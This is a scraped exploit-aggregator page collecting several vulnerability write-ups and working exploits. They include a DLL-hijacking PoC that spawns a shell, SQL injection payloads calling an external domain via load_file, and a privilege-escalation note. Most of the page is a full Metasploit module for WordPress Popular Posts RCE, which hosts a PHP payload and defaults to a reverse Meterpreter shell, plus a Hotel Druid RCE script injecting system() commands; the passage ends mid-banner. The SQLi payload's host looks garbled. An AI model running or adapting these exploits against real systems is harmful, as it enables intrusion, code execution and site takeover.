Latest exploits :: CodePwn

<pre><code>On November 11, 2021 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “Photoswipe Masonry Gallery”, a WordPress plugin that is installed on over 10,000 sites. This flaw makes it possible for an authenticated attacker to inject malicious JavaScript that executes whenever a site administrator accesses the PhotoSwipe Options page or a user accesses a page with a gallery created by the plugin. All Wordfence users, including users of our Free, Premium, Care, and Response products are protected from exploits targeting this vulnerability thanks to the Wordfence Firewall’s built-in Cross-Site Scripting (XSS) protection. We attempted to reach out to the developer day on November 11, 2021, the same day we discovered the vulnerability. We never received a response after a couple of follow-ups so we sent the full details to the WordPres.org plugins team on November 20, 2021. The plugin was fully patched on January 14, 2022. We strongly recommend ensuring that your site has been updated to the latest patched version of “Photoswipe Masonry Gallery”, which is version 1.2.18 at the time of this publication. Description: Authenticated Stored Cross-Site Scripting Affected Plugin: Photoswipe Masonry Gallery Plugin Slug: photoswipe-masonry Plugin Developer: Web Design Gold Coast Affected Versions: <= 1.2.14 CVE ID: CVE-2022-0750 CVSS Score: 6.4 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N Researcher/s: Chloe Chamberland Fully Patched Version: 1.2.15 Photoswipe Masonry Gallery is a plugin designed to enhance gallery creation using the default WordPress gallery builder which can be added to WordPress pages and posts. As with many other plugins available in the WordPress repository, this plugin has the ability to set general options for the plugin. These settings translate over to any gallery that a site owner chooses to create and includes things like thumbnail width and height for images along with many other settings. Unfortunately, this plugin had a vulnerability that made it possible for attackers to modify these settings. Diving deeper, the plugin registered an admin_menu action that hooked to the update function that controlled saving the plugins settings. add_action('admin_menu', array('photoswipe_plugin_options', 'update')); As with several other admin style hooks in WordPress, like wp_ajax, admin_post, and admin_init, the admin_menu hook checks to see if a user is accessing the administrative area of a site prior to loading the hooked function. It does not, however, validate that the user accessing the administrative area is an admin user. The admin_menu action does this to add additional menu pages to the administrative area of a WordPress site. This means that an authenticated user accessing the /wp-admin area of a vulnerable site will trigger the hook and ultimately execute the function associated with the hook. In this case that is the update function. Due to the fact that the update function had no capability checks or nonce checks of it’s own, any authenticated user accessing the /wp-admin area of a vulnerable site could send a POST request with photoswipe_save set to true and update the settings of the plugin. public static function update() { if(isset($_POST['photoswipe_save'])) { $options = photoswipe_plugin_options::pSwipe_getOptions(); $options['thumbnail_width'] = stripslashes($_POST['thumbnail_width']); $options['thumbnail_height'] = stripslashes($_POST['thumbnail_height']); $options['max_image_width'] = stripslashes($_POST['max_image_width']); $options['max_image_height'] = stripslashes($_POST['max_image_height']); Considering the thumbnail_width, thumbnail_height, max_image_width, and max_image_height parameters had no sanitization or validation, attackers could inject malicious JavaScript into the plugin’s settings which would result in the malicious JavaScript executing anytime an administrator accessed the plugins setting page or a user accessed a gallery that was created with the plugin. This malicious JavaScript could be used to redirect site visitors accessing a gallery to malicious domains for further infection or inject new administrative user accounts if an administrator accessed a page containing the malicious payload. As such, it is important to verify that your site has been updated to the latest version as soon as possible. Timeline November 11, 2021 – Conclusion of the plugin analysis that led to the discovery of a Stored Cross-Site Scripting Vulnerability in the “Photoswipe Masonry Gallery” plugin. We verify that the Wordfence Firewall provides sufficient protection. We attempt to initiate contact with the developer. November 30, 2021 – After no response from the developer, we send the full disclosure details to the WordPress plugins team. They acknowledge the report and make contact with the developer. January 4, 2022 – We follow-up with the plugins team asking about a missing capability check on the vulnerable function. They inform us that they have let the developer know and they will have a release out by the end of the month. January 14, 2022 – A fully patched version of the plugin is released as version 1.2.15. Conclusion In today’s post, we detailed a flaw in the “Photoswipe Masonry Gallery” plugin that made it possible for authenticated attackers to inject malicious web scripts that will execute whenever a site owner accesses the PhotoSwipe Options page or a gallery created with the plugin, which could lead to complete site compromise. This flaw has been fully patched in version 1.2.15. We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 1.2.18 at the time of this publication. </code></pre>

<pre><code>Hi all, I have actually contacted Dahua PSIRT team and they confirmed the vulnerability exists few days ago but then since this product is not in that scope on requesting CVE and therefore I am going to disclose the details here: Vulnerable Software and Version: ToolBox-V1.010.0000000.0 (versions prior to this are probably vulnerable but just tested against V1.010.0000000.0) Vulnerable software download link: https://www.dahuasecurity.com/support/downloadCenter/tools/MaintenanceTools Date reported to Dahua: 20 Feb 2022 Date of issue acknowledgement and finding validated from Dahua PSIRT team: 22 Feb 2022 Description: The ToolBox-V1.010.0000000.0 is suffering from DLL hijacking which allows arbitrary code execution and even privilege escalation when a malcious dll name as "DHLog.dll" is dropped to followng folders during my research, PE could be achieved since the exeutable has to be run with administrator privilege by design. Attack vector: A malicious x86 dll named as "DHLog.dll" has to be dropped in ANY of the following folders, which depends on what softwares have been installed in the target windows machine 1. C:\Users\User\AppData\Local\Microsoft\WindowsApps (*Pre-installed in every windows) 2. C:\Users\User\AppData\Local\Programs\Python\Python38\Scripts (Only Applicable when users have installed python in their windows machine) 3. C:\Users\User\AppData\Local\Programs\Python\Python38\ (Only Applicable when users have installed python in their windows machine) PoC code of dll can be found in this repository Attack steps: 1. Craft and drop a malicious DLL named as "DHLog.dll" with entry point DllMain 2. Double click the executable "ToolBox", administrator privilege is required to run 3. Malicious DLL has been called and an admin shell can be obtained as PoC 4. [image: image] <https://user-images.githubusercontent.com/21979646/155094255-095563ec-b353-4a9e-ab91-71c96cdd6366.png> Detail Report can be found here: https://github.com/ScriptIdiot/DLL-Hijacking-PoC-of-ToolBox-V1.010.0000000.0 Kindly let me know if further input is required. Thanks! Kind regards, James Tsz Ko Yeung ----- poc.cpp ----- // Please compile it as x86 #include "pch.h" #include <Windows.h> void cmdspawn() { WinExec("cmd.exe", 1); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: cmdspawn(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } </code></pre>

<pre><code># Title: Simple Mobile Comparison Website v1.0 - SQLi # Author: nu11secur1ty # Date: 02.23.2022 # Vendor: https://www.sourcecodester.com/users/tips23 # Software: https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Simple-Mobile-Comparison-Website ## Description: The `search` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\b2erch904xo23g6w31eg32y49vfo3fr6uulhb50.https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html\\qhe'))+' was submitted in the search parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. WARNING: If this is in some external domain, or some subdomain redirection, or internal whatever, this will be extremely dangerous! Status: CRITICAL [+] Payloads: ```mysql --- Parameter: search (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=218336'+(select load_file('\\\\b2erch904xo23g6w31eg32y49vfo3fr6uulhb50.https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html\\qhe'))+'') AND (SELECT 2552 FROM (SELECT(SLEEP(3)))GbNG) AND ('HpeL'='HpeL Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: search=218336'+(select load_file('\\\\b2erch904xo23g6w31eg32y49vfo3fr6uulhb50.https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html\\qhe'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a717a71,0x735848694861555664694c6a6765425a746554476c705941525556624b5562576d4f646f6f674f55,0x717a787871),NULL,NULL,NULL,NULL,NULL-- - --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Simple-Mobile-Comparison-Website) ## Proof and Exploit: [href](https://streamable.com/mtzocn) </code></pre>

<pre><code># Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions # Discovery by: Luis Martinez # Discovery Date: 2022-02-23 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/mirror_go_full8050.exe # Tested Version: 2.0.11.346 # Vulnerability Type: Local Privilege Escalation # Tested on OS: Windows 10 Pro x64 es # Step to discover Privilege Escalation: # Insecure folders permissions issue: C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe" C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F) # Service info: C:\>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable "ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it with a malicious file that will be executed with "LocalSystem" privileges. </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/e499a4c359a8cc46e641f39c0ed548f9.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Mellpon.b Vulnerability: Remote Unauthenticated Information Disclosure Description: The malware listens on TCP port 80 and creates a dir named "tanaka" with a file named C.html, the HTML file contains a list of all dirs on the system and their contents. Third-party attackers who can reach an infected system can view the screen dumps taken periodically as well as view all directories and files on the system. The screen dumps are in a JPG file named "~ss.jpg" and can be accessed by URL http://x.x.x.x/~ss.jpg. Type: PE32 MD5: e499a4c359a8cc46e641f39c0ed548f9 Vuln ID: MVID-2021-0430 Disclosure: 12/16/2021 Exploit/PoC: 1) Open a web browser to the infected host and navigate to C.html or ~ss.jpg. Screenshots of the infected host. http://x.x.x.x/~ss.jpg 2) All files and directory contents. http://x.x.x.x/C.html 2021/10/13 20:24 28131582 C.html ../ C:/ 2016/11/21 15:06 DIR $Recycle.Bin/ 2018/03/13 15:36 DIR Boot/ 2016/11/21 11:28 DIR Documents and Settings/ 2021/12/13 20:21 DIR dump/ 2017/12/13 20:41 DIR PerfLogs/ 2021/12/13 20:17 DIR Program Files/ 2021/10/03 20:49 DIR Program Files (x86)/ 2021/10/03 21:12 DIR ProgramData/ 2018/03/13 00:44 DIR Recovery/ 2018/03/13 00:45 DIR System Volume Information/ 2018/03/13 00:45 DIR Users/ 2021/07/07 21:14 DIR Windows/ 2018/03/01 01:53 398082 bootmgr 2017/09/29 08:41 1 BOOTNXT 2018/03/13 00:40 8192 BOOTSECT.BAK 2021/10/12 21:10 671088640 pagefile.sys 2021/10/12 21:10 16777216 swapfile.sys C:/$Recycle.Bin/ etc... Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "\n#{Rex::Text.rand_text_alphanumeric(100..200)}\n", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen end end </code></pre>

<pre><code># Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE) # Date: 05/01/2022 # Exploit Author: 0z09e (https://twitter.com/0z09e) # Vendor Homepage: https://www.hoteldruid.com/ # Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz # Version: 3.0.3 # CVE : CVE-2022-22909 #!/usr/bin/python3 import requests import argparse def login( target , username = "" , password = "", noauth=False): login_data = { "vers_hinc" : "1", "nome_utente_phpr" : username, "password_phpr" : password } if not noauth: login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False ) if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text: token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;')[0] anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0] ret_data = {"token" : token , "anno" : anno} #print("ret data" + ret_data) return ret_data else: return False else: login_req = requests.get(f"{target}/inizio.php" , verify=False ) try: anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0] token = "" ret_data = {"token" : token , "anno" : anno} return ret_data except: return False def check_privilege(target , anno , token=""): priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False) #print(priv_req.text) if "Modify" in priv_req.text: return True else: return False def add_room(target , anno , token=""): add_room_data = { "anno": anno, "id_sessione": token, "n_app":"{${system($_REQUEST['cmd'])}}", "crea_app":"SI", "crea_letti":"", "n_letti":"", "tipo_tabella":"appartamenti" } add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False) #print(add_req.text) if "has been added" in add_req.text: return True else: return False def test_code_execution(target): code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id") if "uid=" in code_execution_req.text: return code_execution_req.text.split("\n")[0] else: return False def main(): banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$ | $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ | $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$ | $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$ |__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ 